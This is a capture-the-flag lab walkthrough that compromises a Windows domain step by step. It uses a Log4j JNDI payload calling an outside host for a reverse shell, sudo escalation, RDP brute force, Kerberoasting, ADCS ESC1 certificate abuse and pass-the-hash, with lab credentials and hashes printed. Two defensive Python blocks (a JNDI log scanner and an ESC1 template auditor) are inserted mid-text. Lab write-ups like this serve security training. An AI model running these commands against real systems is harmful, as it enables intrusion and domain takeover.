Information gathering
Flag01
There is a Solr Admin instance; tried attacking it with msf.
That did not work well.
Looking at the page, Solr Admin uses a log4j plugin, so the Log4j RCE can be tried.
Getting a Log4j shell
There is a place here where commands can be executed; change the input to the Log4j PoC:
${jndi:ldap://116.62.53.46:1389/Basic/ReverseShell/116.62.53.46/3333}
Afterwards, sudo privilege escalation is possible:
sudo /usr/bin/grc --pty /bin/sh
flag{c6a57acd-029d-4650-a11a-524ce7ee986a}
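As an added defender-side example for the Log4j step above (not part of this writeup), a small scanner that URL-decodes web access-log lines and flags JNDI lookup strings of the form used in the PoC, plus nested lookups; the log lines are constructed, and the documentation address 203.0.113.10 stands in for the attacker host.

```python
import re
from urllib.parse import unquote

# Plain lookup of the form used in the writeup: ${jndi:<scheme>://<host>[:port]/...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)(?::(\d+))?", re.I)
# A lookup nested inside another ${...} does not occur in legitimate requests;
# flag it as suspicious without trying to resolve it.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def normalize(line):
    """URL-decode twice: payloads in query strings are often double-encoded."""
    return unquote(unquote(line))


def scan_line(line):
    """Return a finding dict for one access-log line, or None if it looks clean."""
    text = normalize(line)
    m = JNDI_RE.search(text)
    if m:
        return {"kind": "jndi_lookup", "scheme": m.group(1).lower(),
                "host": m.group(2), "port": m.group(3)}
    if NESTED_RE.search(text):
        return {"kind": "nested_lookup", "scheme": None, "host": None, "port": None}
    return None


def scan_log(lines):
    """Return [(line_number, finding)] for every line that raised a finding."""
    return [(n, f) for n, ln in enumerate(lines, 1) if (f := scan_line(ln))]


# Constructed nginx access-log lines; 203.0.113.10 is a documentation address.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jul/2023:04:40:01 +0000] "GET /solr/admin/cores?action=STATUS '
    'HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Jul/2023:04:41:13 +0000] "GET /solr/admin/cores?action='
    '%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2FBasic%2FReverseShell%7D '
    'HTTP/1.1" 200 0 "-" "curl/7.88"',
    '10.0.0.9 - - [14/Jul/2023:04:41:20 +0000] "GET /solr/ HTTP/1.1" 200 16555 '
    '"-" "${${x:y}}"',
]

if __name__ == "__main__":
    for n, finding in scan_log(SAMPLE_LOG):
        print(f"line {n}: {finding}")
```

Running it over the constructed lines reports the encoded lookup on line 2 with scheme, host and port, and the nested lookup in the User-Agent on line 3.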
Flag02
After getting the shell, start a Python web server on my own VPS and upload frp and fscan.
start infoscan
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
(icmp) Target 172.22.9.47 is alive
[*] Icmp alive hosts len is: 4
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:139 open
172.22.9.7:139 open
172.22.9.7:88 open
172.22.9.47:445 open
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] WebTitle http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] NetBios 172.22.9.7 [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.9.47 fileserver Windows 6.1
[*] NetInfo
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] WebTitle http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] OsInfo 172.22.9.47 (Windows 6.1)
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
Then set up a proxy with frp and review the information collected from the internal network:
- 172.22.9.7 DC
- 172.22.9.19 entry-point IP
- 172.22.9.47 fileserver
- 172.22.9.26 domain member
[*] NetBios 172.22.9.47 fileserver Windows 6.1
SMB remote connection looks possible, and no password is needed; connect directly:
proxychains smbclient -L 172.22.9.47
proxychains smbclient \\\\172.22.9.47\\fileshare
Flag03
ADCS exploitation -> using Certify
We see there are some more files; get them all.
Look at the database file.
Without knowing the usernames, use the user table it contains to brute-force RDP and see whether remote login works:
proxychains hydra -L user.txt -P pass.txt 172.22.9.26 rdp -vV -e ns
zhangjian i9XDE02pLVf
liupeng fiAzGwEMgTY
But logging in with them did not work.
Back to the hint from Flag02:
Impacket Script Exploitation Guide (Part 1) - Xianzhi Community (先知社区, aliyun.com)
If you are unsure how to use the scripts, see the article above.
proxychains python GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng
proxychains python GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian
Then crack with John:
john --wordlist=rockyou.txt hash
zhangxia\MyPass2@@6
RDP login then succeeded, but the machine has no outbound internet access.
We also have no other machine with a beacon, so we cannot pivot through it to bring this one online.
Use Certify to confirm the vulnerability:
https://github.com/Flangvik/SharpCollection/tree/master
Certify.exe find /vulnerable
ESC1 preconditions:
msPKI-Certificate-Name-Flag:
- ENROLLEE_SUPPLIES_SUBJECT
Means a user requesting a new certificate from this template can request it on behalf of other users, i.e. any user, including domain administrators.
PkiExtendedKeyUsage: Client Authentication
Means certificates issued from this template can be used to authenticate to computers in Active Directory.
Enrollment Rights: NT Authority\Authenticated Users
Means any authenticated user in Active Directory is allowed to request new certificates from this template.
Request a certificate for the domain admin:
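As an added audit example (not from this writeup, Certify or Certipy), the ESC1 preconditions listed above evaluated against raw template attributes, so a defender can check their own templates and confirm a remediation actually breaks the chain; the template dicts are constructed to mirror the "XR Manager" template, and the set of low-privilege groups is an assumption.

```python
# Bits of msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1
CT_FLAG_PEND_ALL_REQUESTS = 0x2  # Certipy shows this as "Requires Manager Approval"
# EKU OIDs that let a certificate authenticate to AD (empty EKU list = any purpose).
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
             "2.5.29.37.0"}             # Any Purpose
# Groups treated as "any domain principal" (assumption; extend per environment).
LOW_PRIV_ENROLLERS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}

def esc1_conditions(tmpl):
    """Evaluate each ESC1 precondition separately; returns {condition: bool}."""
    ekus = tmpl["pKIExtendedKeyUsage"]
    enrollers = {p.split("\\")[-1] for p in tmpl["enrollment_rights"]}
    return {
        "enrollee_supplies_subject": bool(tmpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "client_auth_eku": not ekus or bool(AUTH_EKUS & set(ekus)),
        "no_manager_approval": not tmpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
        "no_authorized_signatures": tmpl["msPKI-RA-Signature"] == 0,
        "low_priv_can_enroll": bool(LOW_PRIV_ENROLLERS & enrollers),
    }

def is_esc1(tmpl):
    """ESC1 needs every condition at once; clearing any one of them breaks the chain."""
    return all(esc1_conditions(tmpl).values())

# Constructed to mirror the "XR Manager" template as printed by Certipy in this writeup.
XR_MANAGER = {
    "name": "XR Manager",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0x8 | 0x1,  # PublishToDs | IncludeSymmetricAlgorithms
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.10.3.4",  # Encrypting File System
                            "1.3.6.1.5.5.7.3.4",       # Secure Email
                            "1.3.6.1.5.5.7.3.2"],      # Client Authentication
    "enrollment_rights": ["XIAORANG.LAB\\Domain Admins", "XIAORANG.LAB\\Domain Users",
                          "XIAORANG.LAB\\Enterprise Admins", "XIAORANG.LAB\\Authenticated Users"],
}
# Remediated copy: subject built from AD (flag cleared) and manager approval required.
HARDENED = dict(XR_MANAGER, name="XR Manager (hardened)",
                **{"msPKI-Certificate-Name-Flag": 0,
                   "msPKI-Enrollment-Flag": XR_MANAGER["msPKI-Enrollment-Flag"] | CT_FLAG_PEND_ALL_REQUESTS})

if __name__ == "__main__":
    for t in (XR_MANAGER, HARDENED):
        print(t["name"], "-> ESC1" if is_esc1(t) else "-> not ESC1", esc1_conditions(t))
```

Either fix alone (clearing ENROLLEE_SUPPLIES_SUBJECT, or requiring manager approval) is enough to make is_esc1 return False; the hardened copy applies both so the per-condition output shows which ones changed.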
Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LAB\Administrator
Here my remote connection showed an error, so I switched to the Linux version of Certify, i.e. Certipy:
proxychains certipy find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
Certificate Authorities
  0
    CA Name : xiaorang-XIAORANG-DC-CA
    DNS Name : XIAORANG-DC.xiaorang.lab
    Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start : 2023-07-14 04:33:21+00:00
    Certificate Validity End : 2028-07-14 04:43:21+00:00
    Web Enrollment : Disabled
    User Specified SAN : Unknown
    Request Disposition : Unknown
    Enforce Encryption for Requests : Unknown
Certificate Templates
  0
    Template Name : XR Manager
    Display Name : XR Manager
    Certificate Authorities : xiaorang-XIAORANG-DC-CA
    Enabled : True
    Client Authentication : True
    Enrollment Agent : False
    Any Purpose : False
    Enrollee Supplies Subject : True
    Certificate Name Flag : EnrolleeSuppliesSubject
    Enrollment Flag : PublishToDs
                      IncludeSymmetricAlgorithms
    Private Key Flag : ExportableKey
    Extended Key Usage : Encrypting File System
                         Secure Email
                         Client Authentication
    Requires Manager Approval : False
    Requires Key Archival : False
    Authorized Signatures Required : 0
    Validity Period : 1 year
    Renewal Period : 6 weeks
    Minimum RSA Key Length : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights : XIAORANG.LAB\Domain Admins
                            XIAORANG.LAB\Domain Users
                            XIAORANG.LAB\Enterprise Admins
                            XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner : XIAORANG.LAB\Administrator
        Write Owner Principals : XIAORANG.LAB\Domain Admins
                                 XIAORANG.LAB\Enterprise Admins
                                 XIAORANG.LAB\Administrator
        Write Dacl Principals : XIAORANG.LAB\Domain Admins
                                XIAORANG.LAB\Enterprise Admins
                                XIAORANG.LAB\Administrator
        Write Property Principals : XIAORANG.LAB\Domain Admins
                                    XIAORANG.LAB\Enterprise Admins
                                    XIAORANG.LAB\Administrator
    [!] Vulnerabilities
      ESC1 : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
Roughly the same as what Certify.exe found, except that here the vulnerable point is stated directly:
proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
This gives us the domain admin of the DC; after that, pass the hash (PtH):
proxychains crackmapexec smb 172.22.9.26 -u administrator -H 2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
Flag04
Then just take the DC:
proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7